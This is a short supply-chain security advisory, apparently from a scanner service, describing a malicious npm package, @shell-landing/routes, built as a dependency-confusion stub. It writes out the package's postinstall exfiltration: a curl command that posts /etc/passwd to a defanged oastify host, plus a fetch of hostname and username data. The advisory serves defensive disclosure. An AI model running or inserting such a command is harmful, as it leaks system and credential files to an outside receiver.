@shell-landing/routes@99.9.5
Malicious code in @shell-landing/routes (npm)
T1195.002 · Compromise Software Supply Chain
Analysis
Dependency-confusion stub: @shell-landing/routes is a 590-byte tarball at sentinel version 99.9.5 with no prior versions, README, or repo. The postinstall hook exfiltrates system data: (1) node scripts/scream3gg.js hex-encodes the hostname, homedir, and username and sends them via fetch to an oastify[.]com subdomain; (2) /usr/bin/curl --data '@/etc/passwd' $(hostname).<subdomain>.oastify[.]com leaks /etc/passwd per machine. oastify[.]com is an OOB interaction endpoint used here as a C2 exfil receiver.
- analyzed by
- Leitwacht
- first seen
- May 29, 2026, 03:31 PM
- analyzed
- May 29, 2026, 09:43 PM
Related advisories
- @veertly/web-app@99.9.9
- @concerns/i18n@99.9.1
- @coterie-baby/common@99.9.1
- unleash-js@99.9.1
- wm-mapper@99.9.1
- @pisell/pisellos@2.2.164
- @pisell/pisellos@2.2.168
- @pisell/pisellos@2.2.169
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.